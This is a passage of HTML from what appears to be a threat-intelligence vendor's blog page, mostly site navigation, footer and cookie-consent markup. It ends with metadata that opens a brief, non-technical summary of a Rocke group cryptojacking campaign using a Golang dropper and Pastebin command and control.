w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="anomali-security-operations-platform" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Anomali Security Operations Platform</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="compliance" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Compliance</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="cyber-threat-intelligence" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Cyber Threat Intelligence</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="isac" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">ISAC</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="malware" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Malware</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="modern-honey-network" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Modern Honey Network</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="research" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Research</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="siem" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">SIEM</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="soar" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">SOAR</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="staxx" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">STAXX</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="security-operations" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Security Operations</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="splunk" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Splunk</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="threat-intelligence-platform" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">Threat Intelligence Platform</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="threatstream" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">ThreatStream</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div><div role="listitem" class="collection-item w-dyn-item"><a href="#" class="blog-category_card background-color-alice-blue w-inline-block"><div filter-parameter="ueba" class="blog-category_content text-align-left"><div class="button-group"><div class="button is-link is-icon full-width"><div class="text-align-left">UEBA</div><div class="icon-embed-xxsmall w-embed"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div></div></div></a></div></div></div></div></div></div></section></div><div class="hide w-dyn-list"><div fs-cmsnest-collection="blog-category" fs-cmsnest-element="template-reference" role="list" class="w-dyn-items"><div role="listitem" class="w-dyn-item"><a rel="nofollow" href="/blog-categories/research" class="w-inline-block"><div>Research</div></a></div></div></div></main><div class="section-border_wrapper margin-bottom-minus align-bottom"><img loading="lazy" alt="" src="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/647e0852cf55e2b1c5266732_v-shape-blue.svg" class="v-shaped-border"/></div><footer footer-bg="color-old" class="footer5_component background-color-darkblue"><footer class="new_footer_component"><div class="padding-global"><div class="container-xlarge text-color-white"><div class="padding-vertical padding-xxlarge"><div class="padding-bottom padding-large"><div class="w-layout-grid new_footer_top-wrapper"><div id="w-node-d0c5be49-12ae-20f5-6f78-5fed048367de-048367d6"><div class="new_footer_logo-link"><img src="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/661c29ef9457b5f44f35eab9_logo%20white.svg" loading="lazy" alt="" class="footer_logo-link-image"/></div><div class="padding-vertical padding-medium"><p class="text-size-small text-weight-normal">808 Winslow Street , Redwood City,  CA, 94063, United States<br/><br/><a href="tel:+18444847328" class="new_footer_text-link">+1 844 4 THREATS (847328) <br/>‍</a><a href="tel:+448000148096" class="new_footer_text-link">+44 8000 148096 (International Toll-Free) <br/><br/>‍</a><a href="mailto:general@anomali.com" class="new_footer_text-link hide">general@anomali.com</a></p></div><div class="w-layout-grid new_footer_social-icons"><a href="https://www.facebook.com/threatstream" target="_blank" class="footer5_social-link text-color-white w-inline-block"><div class="social-icon w-embed"><svg width="100%" height="100%" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M16.5 6H13.5C12.9477 6 12.5 6.44772 12.5 7V10H16.5C16.6137 9.99748 16.7216 10.0504 16.7892 10.1419C16.8568 10.2334 16.8758 10.352 16.84 10.46L16.1 12.66C16.0318 12.8619 15.8431 12.9984 15.63 13H12.5V20.5C12.5 20.7761 12.2761 21 12 21H9.5C9.22386 21 9 20.7761 9 20.5V13H7.5C7.22386 13 7 12.7761 7 12.5V10.5C7 10.2239 7.22386 10 7.5 10H9V7C9 4.79086 10.7909 3 13 3H16.5C16.7761 3 17 3.22386 17 3.5V5.5C17 5.77614 16.7761 6 16.5 6Z" fill="CurrentColor"/> </svg></div></a><a href="https://www.instagram.com/anomali_inc/" target="_blank" class="footer5_social-link text-color-white w-inline-block"><div class="social-icon w-embed"><svg width="100%" height="100%" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" clip-rule="evenodd" d="M16 3H8C5.23858 3 3 5.23858 3 8V16C3 18.7614 5.23858 21 8 21H16C18.7614 21 21 18.7614 21 16V8C21 5.23858 18.7614 3 16 3ZM19.25 16C19.2445 17.7926 17.7926 19.2445 16 19.25H8C6.20735 19.2445 4.75549 17.7926 4.75 16V8C4.75549 6.20735 6.20735 4.75549 8 4.75H16C17.7926 4.75549 19.2445 6.20735 19.25 8V16ZM16.75 8.25C17.3023 8.25 17.75 7.80228 17.75 7.25C17.75 6.69772 17.3023 6.25 16.75 6.25C16.1977 6.25 15.75 6.69772 15.75 7.25C15.75 7.80228 16.1977 8.25 16.75 8.25ZM12 7.5C9.51472 7.5 7.5 9.51472 7.5 12C7.5 14.4853 9.51472 16.5 12 16.5C14.4853 16.5 16.5 14.4853 16.5 12C16.5027 10.8057 16.0294 9.65957 15.1849 8.81508C14.3404 7.97059 13.1943 7.49734 12 7.5ZM9.25 12C9.25 13.5188 10.4812 14.75 12 14.75C13.5188 14.75 14.75 13.5188 14.75 12C14.75 10.4812 13.5188 9.25 12 9.25C10.4812 9.25 9.25 10.4812 9.25 12Z" fill="CurrentColor"/> </svg></div></a><a href="https://twitter.com/anomali" target="_blank" class="footer5_social-link text-color-white w-inline-block"><div class="social-icon w-embed"><svg width="100%" height="100%" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M13.6538 1.6875H16.1348L10.7145 7.8825L17.091 16.3125H12.0975L8.18701 11.1997L3.7125 16.3125H1.23L7.0275 9.68625L0.911255 1.6875H6.03L9.56475 6.36075L13.6538 1.6875ZM12.783 14.8275H14.1578L5.28375 3.0945H3.8085L12.783 14.8275Z" fill="currentcolor"/> </svg></div></a><a href="https://www.linkedin.com/company/anomali/" target="_blank" class="footer5_social-link text-color-white w-inline-block"><div class="social-icon w-embed"><svg width="100%" height="100%" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" clip-rule="evenodd" d="M5 3H19C20.1046 3 21 3.89543 21 5V19C21 20.1046 20.1046 21 19 21H5C3.89543 21 3 20.1046 3 19V5C3 3.89543 3.89543 3 5 3ZM8 18C8.27614 18 8.5 17.7761 8.5 17.5V10.5C8.5 10.2239 8.27614 10 8 10H6.5C6.22386 10 6 10.2239 6 10.5V17.5C6 17.7761 6.22386 18 6.5 18H8ZM7.25 9C6.42157 9 5.75 8.32843 5.75 7.5C5.75 6.67157 6.42157 6 7.25 6C8.07843 6 8.75 6.67157 8.75 7.5C8.75 8.32843 8.07843 9 7.25 9ZM17.5 18C17.7761 18 18 17.7761 18 17.5V12.9C18.0325 11.3108 16.8576 9.95452 15.28 9.76C14.177 9.65925 13.1083 10.1744 12.5 11.1V10.5C12.5 10.2239 12.2761 10 12 10H10.5C10.2239 10 10 10.2239 10 10.5V17.5C10 17.7761 10.2239 18 10.5 18H12C12.2761 18 12.5 17.7761 12.5 17.5V13.75C12.5 12.9216 13.1716 12.25 14 12.25C14.8284 12.25 15.5 12.9216 15.5 13.75V17.5C15.5 17.7761 15.7239 18 16 18H17.5Z" fill="CurrentColor"/> </svg></div></a><a href="https://www.youtube.com/channel/UCloYBsWSqk_5x7gdpOn4y8g" target="_blank" class="footer5_social-link text-color-white w-inline-block"><div class="social-icon w-embed"><svg width="100%" height="100%" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" clip-rule="evenodd" d="M18.5399 4.33992L19.9999 4.48992C21.7284 4.68529 23.0264 6.16064 22.9999 7.89992V16.0999C23.0264 17.8392 21.7284 19.3146 19.9999 19.5099L18.5999 19.6599C14.2315 20.1099 9.82835 20.1099 5.45991 19.6599L3.99991 19.5099C2.27143 19.3146 0.973464 17.8392 0.999909 16.0999V7.89992C0.973464 6.16064 2.27143 4.68529 3.99991 4.48992L5.39991 4.33992C9.76835 3.88995 14.1715 3.88995 18.5399 4.33992ZM11.1099 15.2199L14.9999 12.6199H15.0599C15.2695 12.4833 15.3959 12.2501 15.3959 11.9999C15.3959 11.7497 15.2695 11.5165 15.0599 11.3799L11.1699 8.77992C10.9402 8.62469 10.6437 8.60879 10.3987 8.73859C10.1538 8.86839 10.0004 9.12271 9.99991 9.39992V14.5999C10.0128 14.858 10.1576 15.0913 10.3832 15.2173C10.6088 15.3433 10.8834 15.3443 11.1099 15.2199Z" fill="currentColor"/> </svg></div></a></div></div><div id="w-node-d0c5be49-12ae-20f5-6f78-5fed048367fc-048367d6" class="footer5_link-list margin-bottom margin-medium"><div class="margin-bottom margin-xsmall"><div class="text-size-medium text-weight-semibold">Platform and Products</div></div><a href="/platform" class="footer5_link text-color-white">Anomali Platform</a><a href="/products/copilot" class="footer5_link text-color-white">Anomali Copilot</a><a href="/products/security-analytics" class="footer5_link text-color-white">Anomali Security Analytics</a><a href="/products/threatstream" class="footer5_link text-color-white">Anomali ThreatStream</a></div><div class="footer5_link-list margin-bottom margin-medium"><div class="margin-bottom margin-xsmall"><div class="text-size-medium text-weight-semibold">Marketplace</div></div><a href="/marketplace" class="footer5_link text-color-white">Anomali Marketplace</a><a href="/marketplace/threat-intelligence-feeds" class="footer5_link text-color-white">Threat Intelligence Feeds</a><a href="/marketplace/threat-analysis-tools" class="footer5_link text-color-white">Threat Analysis Tools and Enrichments</a><a href="/marketplace/security-system-partners" class="footer5_link text-color-white">Security System Partners</a><a href="/marketplace/technology-partners" class="footer5_link text-color-white">Marketplace for Partners</a></div><div class="footer5_link-list margin-bottom margin-medium"><div class="margin-bottom margin-xsmall"><div class="text-size-medium text-weight-semibold">Partners</div></div><a href="/partners" class="footer5_link text-color-white">Partners Overview</a><a href="/marketplace/technology-partners" class="footer5_link text-color-white">Join the Technology Partner Program</a><a href="/marketplace/sdks" class="footer5_link text-color-white">Anomali SDKs</a><a href="/threat-intel-sharing" class="footer5_link text-color-white">Threat Intel Sharing</a><a href="https://anomali.channeltivity.com/Login" target="_blank" class="footer5_link text-color-white">Partner Portal Login</a></div><div class="footer5_link-list margin-bottom margin-medium"><div class="margin-bottom margin-xsmall"><div class="text-size-medium text-weight-semibold">Resources</div></div><a href="/resources" class="footer5_link text-color-white">Resource Library</a><a href="/blog" class="footer5_link text-color-white">Blog</a><a href="/company/events" class="footer5_link text-color-white">Events</a><a href="/customer-success" class="footer5_link text-color-white">Support</a><a id="w-node-_0670a61e-0aa2-b082-c03d-0865e7c06276-048367d6" href="/glossary" class="footer5_link text-color-white">Glossary</a></div><div class="new_footer_link-list hide-tablet"></div><div class="new_footer_link-list hide-tablet"><div class="margin-bottom margin-xsmall"><div class="text-size-medium text-weight-semibold">Company</div></div><a href="/company" class="footer5_link text-color-white">About Anomali</a><a href="/company/leadership" class="footer5_link text-color-white">Leadership</a></div><div class="new_footer_link-list show-tablet"><div class="margin-bottom margin-xsmall"><div class="text-size-medium text-weight-semibold">Company</div></div><a href="/company" class="footer5_link text-color-white">About Us</a><a href="/company/leadership" class="footer5_link text-color-white">Leadership</a><a id="w-node-d0c5be49-12ae-20f5-6f78-5fed04836847-048367d6" href="/company/careers" class="footer5_link text-color-white">Careers</a><a id="w-node-d0c5be49-12ae-20f5-6f78-5fed04836849-048367d6" href="/press-room" class="footer5_link text-color-white">Press Room</a><a id="w-node-d0c5be49-12ae-20f5-6f78-5fed0483684b-048367d6" href="/contact" class="footer5_link text-color-white">Contact Us</a><a id="w-node-d0c5be49-12ae-20f5-6f78-5fed0483684d-048367d6" href="/request-a-demo" class="footer5_link text-color-white">Schedule Demo</a></div><div class="new_footer_link-list hide-tablet"><div class="margin-bottom margin-xsmall"><div class="text-size-medium text-weight-semibold"> </div></div><a href="/company/careers" class="footer5_link text-color-white">Careers</a><a href="/press-room" class="footer5_link text-color-white">Press Room</a></div><div class="new_footer_link-list hide-tablet"><div class="margin-bottom margin-xsmall"><div class="text-size-medium text-weight-semibold"> </div></div><a href="/contact" class="footer5_link text-color-white">Contact Us</a><a href="/request-a-demo" class="footer5_link text-color-white">Schedule Demo</a></div></div></div><div class="padding-bottom padding-medium"><div class="footer5_bottom-wrapper"><div class="w-layout-grid footer5_legal-list"><div class="text-size-small">© Copyright 2024 Anomali®. All rights reserved. ThreatStream® is a registered trademark of Anomali Inc. Anomali Match™ ("Match") and Anomali Lens™ ("Lens") are trademarks of Anomali Inc.</div></div></div></div><div class="line-divider"></div><div class="padding-top padding-medium"><div class="footer5_bottom-wrapper"><div class="w-layout-grid footer5_legal-list"><a href="/privacy-policy" class="footer5_legal-link text-color-white">Privacy Policy</a><a href="/terms-of-service" class="footer5_legal-link text-color-white">Terms of Use</a><a href="/cookie-policy" class="footer5_legal-link text-color-white">Cookies Policy</a><a href="/security" class="footer5_legal-link text-color-white">Security</a></div></div></div></div></div></div><div id="fs-cookies" class="fs-cookies"><div fs-cc="banner" class="fs-cc-banner_component"><div class="fs-cc-banner_container"><div class="fs-cc-banner_text">By clicking <strong>“Accept”</strong>, you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our <a href="/cookie-policy" class="fs-cc-banner_text-link">Cookie Policy</a> for more information.</div><div class="fs-cc-banner_buttons-wrapper"><a fs-cc="open-preferences" href="#" class="fs-cc-banner_text-link">Preferences</a><a fs-cc="deny" href="#" class="button is-secondary w-button">Deny</a><a fs-cc="allow" href="#" class="button w-button">Accept</a></div></div><div fs-cc="interaction" class="fs-cc-banner_trigger"></div></div><div fs-cc="manager" class="fs-cc-manager_component"><div fs-cc="open-preferences" class="fs-cc-manager_button"><div class="fs-cc-manager_icon w-embed"><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 30 30" style="enable-background:new 0 0 30 30;" xml:space="preserve"> <style type="text/css"> .st0{fill:#5169E4;} </style> <path class="st0" d="M15,3C8.4,3,3,8.4,3,15s5.4,12,12,12s12-5.4,12-12c0-0.3,0-0.7-0.1-1c-1.4,0-2.5-1-2.8-2.2 C23.8,11.9,23.4,12,23,12c-1.7,0-3-1.3-3-3c-1.7,0-3-1.3-3-3c0-0.2,0-0.5,0.1-0.7C16.4,4.8,16,4,16,3.1C15.7,3,15.3,3,15,3z M25,4 c-0.6,0-1,0.4-1,1s0.4,1,1,1s1-0.4,1-1S25.6,4,25,4z M20,5c-0.6,0-1,0.4-1,1s0.4,1,1,1s1-0.4,1-1S20.6,5,20,5z M11,7 c0.6,0,1,0.4,1,1s-0.4,1-1,1s-1-0.4-1-1S10.4,7,11,7z M27,9c-0.6,0-1,0.4-1,1s0.4,1,1,1s1-0.4,1-1S27.6,9,27,9z M18,11 c0.6,0,1,0.4,1,1s-0.4,1-1,1s-1-0.4-1-1S17.4,11,18,11z M14,13c0.6,0,1,0.4,1,1s-0.4,1-1,1s-1-0.4-1-1S13.4,13,14,13z M9,15 c1.1,0,2,0.9,2,2s-0.9,2-2,2s-2-0.9-2-2S7.9,15,9,15z M22,15c0.6,0,1,0.4,1,1s-0.4,1-1,1s-1-0.4-1-1S21.4,15,22,15z M17,19 c0.6,0,1,0.4,1,1s-0.4,1-1,1s-1-0.4-1-1S16.4,19,17,19z M13,22c0.6,0,1,0.4,1,1s-0.4,1-1,1s-1-0.4-1-1S12.4,22,13,22z"/> </svg></div></div><div fs-cc="interaction" class="fs-cc-manager_trigger"></div></div><div fs-cc-scroll="disable" fs-cc="preferences" class="fs-cc-prefs_component w-form"><form id="cookie-preferences" name="wf-form-Cookie-Preferences" data-name="Cookie Preferences" method="get" class="fs-cc-prefs_form" data-wf-page-id="657dc50a96389eee4e83bf78" data-wf-element-id="e8a67574-5734-4533-b9a6-d30826116373"><div fs-cc="close" class="fs-cc-prefs_close"><div class="fs-cc-prefs_close-icon w-embed"><svg fill="currentColor" aria-hidden="true" focusable="false" viewBox="0 0 16 24"> <path d="M9.414 8l4.293-4.293-1.414-1.414L8 6.586 3.707 2.293 2.293 3.707 6.586 8l-4.293 4.293 1.414 1.414L8 9.414l4.293 4.293 1.414-1.414L9.414 8z"></path> </svg></div></div><div class="fs-cc-prefs_content"><div class="fs-cc-prefs_space-small"><div class="fs-cc-prefs_title font-family-beatrice">Privacy Preference Center</div></div><div class="fs-cc-prefs_space-small"><div class="fs-cc-prefs_text">Our website uses cookies to enhance your experience. Some cookies are essential for basic functionality, while others are used for marketing, analytics, and personalization. You can choose to disable certain types of storage that are not necessary, but this may affect your website experience.</div></div><div class="fs-cc-prefs_space-medium"><a fs-cc="deny" href="#" class="fs-cc-prefs_button fs-cc-button-alt w-button">Reject all cookies</a><a fs-cc="allow" href="#" class="fs-cc-prefs_button w-button">Allow all cookies</a></div><div class="fs-cc-prefs_space-small"><div class="fs-cc-prefs_title font-family-beatrice">Manage Consent Preferences by Category</div></div><div class="fs-cc-prefs_option"><div class="fs-cc-prefs_toggle-wrapper"><div class="fs-cc-prefs_label font-family-beatrice">Essential</div><div class="fs-cc-prefs_text"><strong>Always Active</strong></div></div><div class="fs-cc-prefs_text">These are required to enable basic website functionality.</div></div><div class="fs-cc-prefs_option"><div class="fs-cc-prefs_toggle-wrapper"><div class="fs-cc-prefs_label font-family-beatrice">Analytics</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="analytics" name="Analytics" data-name="Analytics" fs-cc-checkbox="analytics" class="w-checkbox-input fs-cc-prefs_checkbox"/><span for="Analytics" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span><div class="fs-cc-prefs_toggle"></div></label></div><div class="fs-cc-prefs_text">These help us understand how the website performs, how visitors interact with the site, and whether there may be technical issues.</div></div><div class="fs-cc-prefs_option"><div class="fs-cc-prefs_toggle-wrapper"><div class="fs-cc-prefs_label font-family-beatrice">Marketing</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="marketing" name="Marketing" data-name="Marketing" fs-cc-checkbox="marketing" class="w-checkbox-input fs-cc-prefs_checkbox"/><span for="Marketing" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span><div class="fs-cc-prefs_toggle"></div></label></div><div class="fs-cc-prefs_text">We use these to deliver advertising that is more relevant to you and your interests. We also use them to limit the number of times you see an advertisement and measure the effectiveness of advertising campaigns.</div></div><div class="fs-cc-prefs_option"><div class="fs-cc-prefs_toggle-wrapper"><div class="fs-cc-prefs_label font-family-beatrice">Personalization</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="Personalization" name="Personalization" data-name="Personalization" fs-cc-checkbox="personalization" class="w-checkbox-input fs-cc-prefs_checkbox"/><span for="Personalization" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span><div class="fs-cc-prefs_toggle"></div></label></div><div class="fs-cc-prefs_text">These items allow the us to remember choices you make (such as your user name, language, or the region you are in) and provide enhanced, more personal features.</div></div><div class="fs-cc-prefs_buttons-wrapper"><a fs-cc="submit" href="#" class="fs-cc-prefs_button w-button">Confirm my preferences and close</a></div><input type="submit" data-wait="Please wait..." class="fs-cc-prefs_submit-hide w-button" value="Submit"/><div class="w-embed"><style> /* smooth scrolling on iOS devices */ .fs-cc-prefs_content{-webkit-overflow-scrolling: touch} </style></div></div></form><div class="w-form-done"></div><div class="w-form-fail"></div><div fs-cc="close" class="fs-cc-prefs_overlay"></div><div fs-cc="interaction" class="fs-cc-prefs_trigger"></div></div><div class="hide w-embed"><style> /*width*/ /*width*/ .fs-cc-prefs_content::-webkit-scrollbar { width:3px; } /*thumb*/ .fs-cc-prefs_content::-webkit-scrollbar-thumb { background:rgb(175, 175, 175); } .fs-cc-prefs_content { overflow-x: hidden!important; overflow-y: scroll!important; } /* Hide Horizontal Scrollbar */ .fs-cc-prefs_content::-webkit-scrollbar-horizontal { display: none; } </style></div></div><div class="footer-bg-styles w-embed"><style> [footer-bg~="color-old"] .new_footer_component { background-color: var(--midnight-blue); } [footer-bg~="color-new"] .new_footer_component { background-color: var(--oxford); } </style></div></footer></footer></div><script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=6453db2ad32b573c40a15c49" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script><script src="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/js/anomali-staging.f53208212.js" type="text/javascript"></script><style> /* Add CSS styles for the selected option */ #languageSelect option:checked { color: red; /* Change this to your desired color */ } </style> <script> document.addEventListener('DOMContentLoaded', function () { var banner = document.getElementById('banner'); var closeBanner = document.getElementById('closeBanner'); var menuButton = document.querySelector('.navbar_menu-button'); function closeBannerAndMenu() { banner.style.display = 'none'; } closeBanner.addEventListener('click', closeBannerAndMenu); menuButton.addEventListener('click', closeBannerAndMenu); menuButton.addEventListener('keypress', function (event) { // Close banner when Enter key is pressed on menu button if (event.key === 'Enter') { closeBannerAndMenu(); } }); }); </script> <script> // Function to pre-fill the field with name "GCLID__c" function prefillGCLIDField() { // Prefill the field with name "GCLID__c" using JavaScript var gclidField = document.getElementsByName("GCLID__c")[0]; if (gclidField) { // Retrieve the GCLID value from the cookie var gclidValue = getCookieValue("gclid"); // Set the field's value console.log("Prefilling GCLID__c field with value:", gclidValue); gclidField.value = gclidValue || ""; } } // Call the function to pre-fill the GCLID field prefillGCLIDField(); </script><script> // Get the current page URL const currentURL = window.location.href; // Extract the root page URL const rootURL = currentURL.split('/')[2]; // Create a JavaScript variable with the root URL const rootPageURL = `${rootURL}`; $(document).ready(function() { $("[filter-parameter]").on("click", function(event) { event.preventDefault(); // Extract the slug value from the clicked element var slug = $(this).attr("filter-parameter"); // Construct the URL using the extracted slug var url = "https://"+rootPageURL+"/blog?"+slug+"=checked"; console.log(url); // Redirect to the constructed URL window.location.href = url; }); }); </script>  <script type="application/ld+json"> { "@context": "http://schema.org", "@type": "BlogPosting", "headline": "Rocke Evolves Its Arsenal With a New Malware Family Written in Golang", // Title "image": "https://cdn.prod.website-files.com/6454d31338f3f4b0b5ecdf5f/648e7040671682aaba4fe968_blog-rocke-group.webp", // Featured Image "mainEntityOfPage": { "@type": "WebPage", "@id": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" // Slug }, "publisher": { "@type": "Organization", "name": "Anomali Inc.", "email": "mailto:info@anomali.com", // Corrected email format "address": { "@type": "PostalAddress", // Added PostalAddress type "streetAddress": "808 Winslow Street", // Split address into components "addressLocality": "California", "addressRegion": "United States", "postalCode": "94063", "addressCountry": "US" }, "logo": { "@type": "ImageObject", "url": "https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/6629c9094ced776895005c80_Anomali-Logo-Full-Color-2024-1200.webp" } }, "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang", // Corrected absolute URL for consistency "datePublished": "May 17, 2024", // Published On "dateCreated": "Jun 17, 2023", // Created On "dateModified": "Oct 04, 2023", // Updated On "description": "The “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how they’re stealing your cycles.", // Meta Description "author": { "@type": "Person", "name": "Anomali Threat Research" // Author }, "alternativeHeadline": "Rocke Evolves Its Arsenal With a New Malware Family Written in Golang | Anomali Labs", // Meta Title "articleBody": "<h2>Summary</h2><p>The “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how they’re stealing your cycles. Rocke is actively updating and pushing a new dropper using Pastebin for Command and Control (C2). Recent updates to the C2 as of March 13th, 2019 have been seen, which leads researchers to believe this campaign is ongoing. According to VirusTotal, the threat detection of the new dropper is nearly non-existent. The group has been observed in previous campaigns to use “ld.so.preload” function to hook libc functions. The hooking is used to hide the dropper and the mining software installed by the malware and prevents it from showing up in the “currently running” process list. This tactic is being utilized by the group in this new campaign. The miner uses a private mining pool hosted on DigitalOcean which is a 